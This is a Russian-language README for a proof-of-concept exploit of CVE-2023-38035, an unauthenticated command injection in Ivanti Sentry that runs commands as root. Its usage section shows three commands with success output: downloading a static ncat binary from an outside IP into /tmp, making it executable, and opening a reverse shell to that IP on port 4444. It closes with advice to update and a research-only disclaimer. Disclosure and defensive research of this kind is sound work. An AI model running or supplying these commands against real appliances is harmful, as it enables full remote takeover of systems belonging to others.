
Ivanti Sentry CVE-2023-38035
POC для CVE-2023-38035, затрагивающего Ivanti Sentry
Технический анализ первопричины уязвимости можно найти в нашем блоге: https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive
Этот POC использует неаутентифицированную инъекцию команд для выполнения произвольных команд от имени пользователя root.
Контекст выполнения не позволяет использовать конвейер команд, и в системе нет легко используемых бинарных файлов, поэтому команды можно объединять для загрузки статического ncat откуда-то, например, из https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/ncat.
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'wget http://123.123.123.123:8000/ncat -O /tmp/ncat'
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'chmod +x /tmp/ncat'
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'sudo /tmp/ncat 123.123.123.123 4444 -e /bin/sh'
[+] Successfully executed command on target!

Обновитесь до последней версии в соответствии с инструкциями в уведомлении Ivanti Advisory
Это программное обеспечение было создано исключительно для целей академических исследований и разработки эффективных методов защиты и не предназначено для использования для атаки на системы, за исключением случаев, когда это явно разрешено. Сопровождающие проекта не несут ответственности за неправомерное использование программного обеспечения. Используйте ответственно.